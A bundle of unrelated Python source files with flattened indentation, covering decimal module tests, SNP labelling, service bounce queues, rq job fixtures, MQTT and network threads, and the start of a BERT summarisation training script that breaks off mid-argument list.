self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch in %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
def mkargs(module, sig):
args = []
kwargs = {}
for name, param in sig.parameters.items():
if name == 'self': continue
if param.kind == POS:
args.append(pdict[module][name])
elif param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
else:
raise TestFailed("unexpected parameter kind")
return args, kwargs
def tr(s):
"""The C Context docstrings use 'x' in order to prevent confusion
with the article 'a' in the descriptions."""
if s == 'x': return 'a'
if s == 'y': return 'b'
if s == 'z': return 'c'
return s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
for attr in dir(p_type):
if attr.startswith('_'):
continue
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
if inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) for x in c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
p_kind = [x.kind for x in p_sig.parameters.values()]
c_kind = [x.kind for x in c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
if ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch in %s" % p_func)
else: # Context methods are positional only in the C version.
self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch in %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
try:
getattr(c_type(9), attr)(*args, **kwds)
except Exception:
raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
try:
getattr(p_type(9), attr)(*args, **kwds)
except Exception:
raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure insures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
if not orig_sys_decimal is sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
positive.py
|
import numpy as np
import pandas as pd
import multiprocessing as mp
from tqdm import tqdm
class positive():
__chrom_set = ["chr"+str(i) for i in range(1, 23)] + ["chrX", "chrY"]
def __init__(self, filename="grasp_sub_w_annot.txt"):
self.cores = mp.cpu_count()
self.grasp_w_annotation = pd.read_csv(filename, sep="\t")
def generate_positive(self, grasp_groups, window_size):
for name, group in tqdm(grasp_groups, total=len(grasp_groups)):
group["positive"] = None
# protein-coding SNPs are NOT positive
group.loc[group["annotation"]=="pcexon", "positive"] = False
df_pcexon = group[(group["annotation"]=="pcexon") & (group["Pvalue"] < 5e-8)] # associated pcexon
for chromStart_pcexon, pmid, phenotype in zip(df_pcexon["pos"], df_pcexon["PMID"], df_pcexon["Phenotype"]):
group.loc[(group["pos"] >= chromStart_pcexon - window_size/2) & \
(group["pos"] <= chromStart_pcexon + window_size/2) & \
(group["PMID"] == pmid) & \
(group["Phenotype"] == phenotype), "positive"] = False
for ind, row in group.iterrows():
if row["positive"] == True:
continue
if row["positive"] == False:
continue
id_locus = group.loc[(group["pos"] >= row["pos"] - window_size/2) & \
(group["pos"] <= row["pos"] + window_size/2) & \
(group["annotation"] != "pcexon")]["ID"]
min_pvalue = group.loc[group["ID"].isin(id_locus), "Pvalue"].min()
id_min_pvalue = group.loc[group["Pvalue"]==min_pvalue, "ID"]
group.loc[group["ID"].isin(id_locus), "positive"] = False
group.loc[(group["ID"].isin(id_min_pvalue)) & \
(group["annotation"]!="pcexon"), "positive"] = True
self.positive_list.append(group)
# parallel computing of positive cases
def fast_generate_positive(self, window_size):
self.manager = mp.Manager()
self.positive_list = self.manager.list()
processes = []
groups = self.grasp_w_annotation.groupby(["chr", "PMID", "Phenotype"])
grasp_groups_list = np.array_split(groups, self.cores)
for grasp_groups in grasp_groups_list:
p = mp.Process(target=self.generate_positive, args=(grasp_groups, window_size))
processes.append(p)
for p in processes:
p.start()
for p in processes:
p.join()
self.grasp_sub_w_annot_positive = pd.concat(self.positive_list)
self.grasp_sub_w_annot_positive.sort_values(by=['SNPid(dbSNP134)', 'ID', 'positive'], ascending=[True, True, False], inplace=True) # order according to [rsid, positive]
self.grasp_sub_w_annot_positive.drop_duplicates(subset='SNPid(dbSNP134)', keep='first', inplace=True) # keep all the TRUE if there is a TRUE (the first entry for each SNP rsid)
self.grasp_sub_w_annot_positive.reset_index(drop=True, inplace=True)
print("[INFO] generate grasp_sub_w_annot_positive!")
return self.grasp_sub_w_annot_positive
|
common.py
|
import logging
import time
from contextlib import contextmanager
from queue import Empty
from queue import PriorityQueue
from queue import Queue
from threading import Condition
from threading import Event
from threading import Thread
from typing import Any
from typing import Collection
from typing import Generator
from typing import Iterable
from typing import List
from typing import NamedTuple
from typing import Optional
from typing import Tuple
from typing_extensions import Protocol
from paasta_tools.marathon_tools import DEFAULT_SOA_DIR
from paasta_tools.marathon_tools import get_all_marathon_apps
from paasta_tools.marathon_tools import get_marathon_clients
from paasta_tools.marathon_tools import get_marathon_servers
from paasta_tools.marathon_tools import load_marathon_service_config_no_cache
from paasta_tools.marathon_tools import MarathonClients
from paasta_tools.marathon_tools import MarathonServiceConfig
from paasta_tools.metrics.metrics_lib import TimerProtocol
from paasta_tools.utils import load_system_paasta_config
class BounceTimers(NamedTuple):
processed_by_worker: TimerProtocol
setup_marathon: TimerProtocol
bounce_length: TimerProtocol
class ServiceInstance(NamedTuple):
service: str
instance: str
watcher: str
bounce_by: float
wait_until: float
enqueue_time: float
bounce_start_time: float
failures: int = 0
processed_count: int = 0
# Hack to make the default values for ServiceInstance work on python 3.6.0. (typing.NamedTuple gained default values in
# python 3.6.1.)
ServiceInstance.__new__.__defaults__ = (0, 0) # type: ignore
class PaastaThread(Thread):
@property
def log(self) -> logging.Logger:
name = ".".join([type(self).__module__, type(self).__name__])
return logging.getLogger(name)
class PaastaQueue(Queue):
def __init__(self, name: str, *args: Any, **kwargs: Any) -> None:
self.name = name
super().__init__(*args, **kwargs)
@property
def log(self) -> logging.Logger:
name = ".".join([type(self).__module__, type(self).__name__])
return logging.getLogger(name)
def put(self, item: Any, *args: Any, **kwargs: Any) -> None:
self.log.debug(f"Adding {item} to {self.name} queue")
super().put(item, *args, **kwargs)
def exponential_back_off(
failures: int, factor: float, base: float, max_time: float
) -> float:
seconds = factor * base ** failures
return seconds if seconds < max_time else max_time
def get_service_instances_needing_update(
marathon_clients: MarathonClients,
instances: Collection[Tuple[str, str]],
cluster: str,
) -> List[Tuple[str, str, MarathonServiceConfig]]:
marathon_apps = {}
for marathon_client in marathon_clients.get_all_clients():
marathon_apps.update(
{app.id: app for app in get_all_marathon_apps(marathon_client)}
)
marathon_app_ids = marathon_apps.keys()
service_instances = []
for service, instance in instances:
try:
config = load_marathon_service_config_no_cache(
service=service,
instance=instance,
cluster=cluster,
soa_dir=DEFAULT_SOA_DIR,
)
config_app = config.format_marathon_app_dict()
app_id = "/{}".format(config_app["id"])
# Not ideal but we rely on a lot of user input to create the app dict
# and we really can't afford to bail if just one app definition is malformed
except Exception as e:
print(
"ERROR: Skipping {}.{} because: '{}'".format(service, instance, str(e))
)
continue
if app_id not in marathon_app_ids:
service_instances.append((service, instance, config))
elif marathon_apps[app_id].instances != config_app["instances"]:
service_instances.append((service, instance, config))
return service_instances
def get_marathon_clients_from_config() -> MarathonClients:
system_paasta_config = load_system_paasta_config()
marathon_servers = get_marathon_servers(system_paasta_config)
marathon_clients = get_marathon_clients(marathon_servers)
return marathon_clients
class DelayDeadlineQueueProtocol(Protocol):
def __init__(self) -> None:
...
def put(self, si: ServiceInstance) -> None:
...
@contextmanager
def get(
self, block: bool = True, timeout: float = None
) -> Generator[ServiceInstance, None, None]:
...
def get_available_service_instances(
self, fetch_service_instances: bool
) -> Iterable[Tuple[float, Optional[ServiceInstance]]]:
...
def get_unavailable_service_instances(
self, fetch_service_instances: bool
) -> Iterable[Tuple[float, float, Optional[ServiceInstance]]]:
...
class DelayDeadlineQueue(DelayDeadlineQueueProtocol):
"""Entries into this queue have both a wait_until and a bounce_by. Before wait_until, get() will not return an entry.
get() returns the entry whose wait_until has passed and which has the lowest bounce_by."""
def __init__(self) -> None:
self.available_service_instances: PriorityQueue[
Tuple[float, ServiceInstance]
] = PriorityQueue()
self.unavailable_service_instances: PriorityQueue[
Tuple[float, float, ServiceInstance]
] = PriorityQueue()
self.unavailable_service_instances_modify = Condition()
self.background_thread_started = Event()
Thread(target=self.move_from_unavailable_to_available, daemon=True).start()
self.background_thread_started.wait()
@property
def log(self) -> logging.Logger:
name = ".".join([type(self).__module__, type(self).__name__])
return logging.getLogger(name)
def put(self, si: ServiceInstance) -> None:
self.log.debug(
f"adding {si.service}.{si.instance} to queue with wait_until {si.wait_until} and bounce_by {si.bounce_by}"
)
with self.unavailable_service_instances_modify:
self.unavailable_service_instances.put((si.wait_until, si.bounce_by, si))
self.unavailable_service_instances_modify.notify()
def move_from_unavailable_to_available(self) -> None:
self.background_thread_started.set()
with self.unavailable_service_instances_modify:
while True:
try:
while True:
(
wait_until,
bounce_by,
si,
) = self.unavailable_service_instances.get_nowait()
if wait_until < time.time():
self.available_service_instances.put_nowait((bounce_by, si))
else:
self.unavailable_service_instances.put_nowait(
(wait_until, bounce_by, si)
)
timeout = wait_until - time.time()
break
except Empty:
timeout = None
self.unavailable_service_instances_modify.wait(timeout=timeout)
@contextmanager
def get(
self, block: bool = True, timeout: float = None
) -> Generator[ServiceInstance, None, None]:
bounce_by, si = self.available_service_instances.get(
block=block, timeout=timeout
)
try:
yield si
except Exception:
self.available_service_instances.put((bounce_by, si))
def get_available_service_instances(
self, fetch_service_instances: bool
) -> Iterable[Tuple[float, Optional[ServiceInstance]]]:
return [
(bounce_by, (si if fetch_service_instances else None))
for bounce_by, si in self.available_service_instances.queue
]
def get_unavailable_service_instances(
self, fetch_service_instances: bool
) -> Iterable[Tuple[float, float, Optional[ServiceInstance]]]:
return [
(wait_until, bounce_by, (si if fetch_service_instances else None))
for wait_until, bounce_by, si in self.unavailable_service_instances.queue
]
|
__init__.py
|
import cv2
from maragi import Client
from time import time, sleep
import threading
class Microservice():
def __init__(self, fps=1, ip='127.0.0.1', port='9999'):
self.fps = fps
self.client = Client(ip=ip, port=port)
def _transmit_loop(self):
cap = cv2.VideoCapture(0)
while True:
start = time()
ret, frame = cap.read()
self.client.send(frame)
elapsed = time() - start
delay = 1.0 / self.fps - elapsed
sleep(delay)
def run(self):
self.thread = threading.Thread(target=self._transmit_loop)
self.thread.start()
def stop(self):
self.thread.stop()
def original(self):
cap = cv2.VideoCapture(0)
while True:
start = time()
ret, frame = cap.read()
self.client.send(frame)
elapsed = time() - start
delay = 1.0 / self.fps - elapsed
sleep(delay)
|
fixtures.py
|
# -*- coding: utf-8 -*-
"""
This file contains all jobs that are used in tests. Each of these test
fixtures has a slighty different characteristics.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
import time
import signal
import sys
import subprocess
import contextlib
from multiprocessing import Process
from redis import Redis
from rq import Connection, get_current_job, get_current_connection, Queue
from rq.decorators import job
from rq.compat import text_type
from rq.worker import HerokuWorker, Worker
def say_pid():
return os.getpid()
def say_hello(name=None):
"""A job with a single argument and a return value."""
if name is None:
name = 'Stranger'
return 'Hi there, %s!' % (name,)
def say_hello_unicode(name=None):
"""A job with a single argument and a return value."""
return text_type(say_hello(name)) # noqa
def do_nothing():
"""The best job in the world."""
pass
def raise_exc():
raise Exception('raise_exc error')
def raise_exc_mock():
return raise_exc
def div_by_zero(x):
"""Prepare for a division-by-zero exception."""
return x / 0
def some_calculation(x, y, z=1):
"""Some arbitrary calculation with three numbers. Choose z smartly if you
want a division by zero exception.
"""
return x * y / z
def rpush(key, value, append_worker_name=False, sleep=0):
"""Push a value into a list in Redis. Useful for detecting the order in
which jobs were executed."""
if sleep:
time.sleep(sleep)
if append_worker_name:
value += ':' + get_current_job().worker_name
redis = get_current_connection()
redis.rpush(key, value)
def check_dependencies_are_met():
return get_current_job().dependencies_are_met()
def create_file(path):
"""Creates a file at the given path. Actually, leaves evidence that the
job ran."""
with open(path, 'w') as f:
f.write('Just a sentinel.')
def create_file_after_timeout(path, timeout):
time.sleep(timeout)
create_file(path)
def create_file_after_timeout_and_setsid(path, timeout):
os.setsid()
create_file_after_timeout(path, timeout)
def launch_process_within_worker_and_store_pid(path, timeout):
p = subprocess.Popen(['sleep', str(timeout)])
with open(path, 'w') as f:
f.write('{}'.format(p.pid))
p.wait()
def access_self():
assert get_current_connection() is not None
assert get_current_job() is not None
def modify_self(meta):
j = get_current_job()
j.meta.update(meta)
j.save()
def modify_self_and_error(meta):
j = get_current_job()
j.meta.update(meta)
j.save()
return 1 / 0
def echo(*args, **kwargs):
return args, kwargs
class Number(object):
def __init__(self, value):
self.value = value
@classmethod
def divide(cls, x, y):
return x * y
def div(self, y):
return self.value / y
class CallableObject(object):
def __call__(self):
return u"I'm callable"
class UnicodeStringObject(object):
def __repr__(self):
return u'รฉ'
with Connection():
@job(queue='default')
def decorated_job(x, y):
return x + y
def black_hole(job, *exc_info):
# Don't fall through to default behaviour (moving to failed queue)
return False
def add_meta(job, *exc_info):
job.meta = {'foo': 1}
job.save()
return True
def save_key_ttl(key):
# Stores key ttl in meta
job = get_current_job()
ttl = job.connection.ttl(key)
job.meta = {'ttl': ttl}
job.save_meta()
def long_running_job(timeout=10):
time.sleep(timeout)
return 'Done sleeping...'
def run_dummy_heroku_worker(sandbox, _imminent_shutdown_delay):
"""
Run the work horse for a simplified heroku worker where perform_job just
creates two sentinel files 2 seconds apart.
:param sandbox: directory to create files in
:param _imminent_shutdown_delay: delay to use for HerokuWorker
"""
sys.stderr = open(os.path.join(sandbox, 'stderr.log'), 'w')
class TestHerokuWorker(HerokuWorker):
imminent_shutdown_delay = _imminent_shutdown_delay
def perform_job(self, job, queue):
create_file(os.path.join(sandbox, 'started'))
# have to loop here rather than one sleep to avoid holding the GIL
# and preventing signals being received
for i in range(20):
time.sleep(0.1)
create_file(os.path.join(sandbox, 'finished'))
w = TestHerokuWorker(Queue('dummy'))
w.main_work_horse(None, None)
class DummyQueue(object):
pass
def kill_worker(pid, double_kill, interval=0.5):
# wait for the worker to be started over on the main process
time.sleep(interval)
os.kill(pid, signal.SIGTERM)
if double_kill:
# give the worker time to switch signal handler
time.sleep(interval)
os.kill(pid, signal.SIGTERM)
class Serializer(object):
def loads(self): pass
def dumps(self): pass
def start_worker(queue_name, conn_kwargs, worker_name, burst):
"""
Start a worker. We accept only serializable args, so that this can be
executed via multiprocessing.
"""
# Silence stdout (thanks to <https://stackoverflow.com/a/28321717/14153673>)
with open(os.devnull, 'w') as devnull:
with contextlib.redirect_stdout(devnull):
w = Worker([queue_name], name=worker_name, connection=Redis(**conn_kwargs))
w.work(burst=burst)
def start_worker_process(queue_name, connection=None, worker_name=None, burst=False):
"""
Use multiprocessing to start a new worker in a separate process.
"""
connection = connection or get_current_connection()
conn_kwargs = connection.connection_pool.connection_kwargs
p = Process(target=start_worker, args=(queue_name, conn_kwargs, worker_name, burst))
p.start()
return p
def burst_two_workers(queue, timeout=2, tries=5, pause=0.1):
"""
Get two workers working simultaneously in burst mode, on a given queue.
Return after both workers have finished handling jobs, up to a fixed timeout
on the worker that runs in another process.
"""
w1 = start_worker_process(queue.name, worker_name='w1', burst=True)
w2 = Worker(queue, name='w2')
jobs = queue.jobs
if jobs:
first_job = jobs[0]
# Give the first worker process time to get started on the first job.
# This is helpful in tests where we want to control which worker takes which job.
n = 0
while n < tries and not first_job.is_started:
time.sleep(pause)
n += 1
# Now can start the second worker.
w2.work(burst=True)
w1.join(timeout)
|
ECS_manager.py
|
from time import sleep
from threading import Thread
import paho.mqtt.client as mqtt
MQTT_ADDRESS = "localhost"
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected with result code "+str(rc) + "\n")
def on_message(client, userdata, msg):
print(msg.topic+" "+str(msg.payload) + "\n")
def ecsMqttMonitor():
mqttClient = mqtt.Client()
mqttClient.on_connect = on_connect
mqttClient.on_message = on_message
mqttClient.connect(MQTT_ADDRESS)
mqttClient.subscribe("ECS/temp")
mqttClient.loop_forever()
def calendarMonitor():
while True:
print "second thread"
sleep(1)
def heatMgr():
mqttClient = mqtt.Client()
mqttClient.on_connect = on_connect
mqttClient.on_message = on_message
mqttClient.connect(MQTT_ADDRESS)
mqttClient.loop_start()
t = Thread(target=ecsMqttMonitor, args=())
t.start()
t2 = Thread(target=calendarMonitor, args=())
t2.start()
t3 = Thread(target=heatMgr, args=())
t3.start()
|
Network.py
|
import asyncore
import threading
from network.ntypes import AsyncServer, AsyncClient
def calc_time(since, until):
"""
simple function to calculate time passage
:param since: the start of the moment
:type since: time.struct_time
:param until: the end of the moment
:type until: time.struct_time
:return: the length of the calculated moment in seconds
:rtype: int or long
"""
years = until[0] - since[0]
months = until[1] - since[1]
days = until[2] - since[2]
hours = until[3] - since[3]
minutes = until[4] - since[4]
seconds = until[5] - since[5]
result = seconds + minutes * 60 + hours * 3600 + days * 86400 + months * 2592000 + years * 946080000
return result
def data_thread(queue):
"""
deprecated
simple thread for interactive input
:param queue: the object for transferring the data to the network thread
:type queue: list
"""
message = ''
while not message.lower() == 'exit':
message = raw_input("Enter massage:\n")
queue.append(message)
def net_thread(name, host, port, instream, outstream):
"""
simple thread for communicating with the server
:param name: name of the player
:type name: str
:param host: the IP(v4) address of the server
:type host: str
:param port: the port on which the server is listening
:type port: int
:param instream: object collecting the data to send to the server
:type instream: list
:param outstream: object for distributing the data collected from the server
:type outstream: list
"""
play = AsyncClient(name, host, port, instream, outstream)
asyncore.loop()
def server():
"""
thread function to run the server
"""
# current maximum of players per game
# possible change: operator determine the number of players
MAX_PLAYERS = 2
serv = AsyncServer(MAX_PLAYERS)
# basic show of server location
print serv.address
asyncore.loop()
def player(name, address, port):
"""
deprecated
simple thread for checking server stability
:param name: name of the user
:type name: str
:param address: the IP(v4) of the server
:type address: str
:param port: the port on which the server is listening
:type port: int
"""
stream = []
net = threading.Thread(target=net_thread, args=(name, address, port, stream, stream))
data = threading.Thread(target=data_thread, args=(stream,))
net.start()
data.start()
net.join()
data.join()
|
train.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
from transformers import BertConfig
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.model_builder import Summarizer
from models.trainer import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers','encoder','ff_actv', 'use_interval','rnn_size']
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def multi_main(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' %gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train(args,device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def wait_and_validate(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
model.load_cp(checkpoint)
model.eval()
valid_iter =data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
trainer = build_trainer(args, device_id, model, None)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
model.load_cp(checkpoint)
model.eval()
test_iter =data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, model, None)
trainer.test(test_iter,step)
def baseline(args, cal_lead=False, cal_oracle=False):
test_iter =data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, None, None)
#
if (cal_lead):
trainer.test(test_iter, 0, cal_lead=True)
elif (cal_oracle):
trainer.test(test_iter, 0, cal_oracle=True)
def train(args, device_id):
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = Summarizer(args, device, load_pretrained_bert=True)
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
model.load_cp(checkpoint)
optim = model_builder.build_optim(args, model, checkpoint)
else:
optim = model_builder.build_optim(args, model, None)
logger.info(model)
trainer = build_trainer(args, device_id, model, optim)
trainer.train(train_iter_fct, args.train_steps)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-encoder", default='classifier', type=str, choices=['classifier','transformer','rnn','baseline'])
parser.add_argument("-mode", default='train', type=str, choices=['train','validate','test'])
parser.add_argument("-bert_data_path", default='../bert_data/cnndm')
parser.add_argument("-model_path", default='../models/')
parser.add_argument("-result_path", default='../results/cnndm')
parser.add_argument("-temp_dir", default='../temp')
parser.add_argument("-bert_config_path", default='../bert_config_uncased_base.json')
parser.add_argument("-batch_size", default=1000, type=int)
parser.add_argument("-use_interval", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-hidden_size", default=128, type=int)
parser.add_argument("-ff_size", default=512, type=int)
parser.add_argument("-heads", default=4, type=int)
parser.add_argument("-inter_layers", default=2, type=int)
parser.add_argument("-rnn_size", default=512, type=int)
parser.add_argument("-param_init", default=0, type=float)
parser.add_argument("-param_init_glorot", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-dropout", default=0.1, type=float)
parser.add_argument("-optim", default='adam', type=str)
parser.add_argument("-lr", default=1, type=float)
parser.add_argument("-beta1", default= 0.9, type=float)
parser.add_argument("-beta2", default=0.999, type=float)
parser.add_argument("-decay_method", default='', type=str)
parser.add_argument("-warmup_steps", default=8000, type=int)
parser.add_argument("-max_grad_norm", default=0, type=float)
parser.add_argument("-save_checkpoint_steps", default=5, type=int)
parser.add_argument("-accum_count", default=1, type=int)
parser.add_argument("-world_size", default=1, type=int)
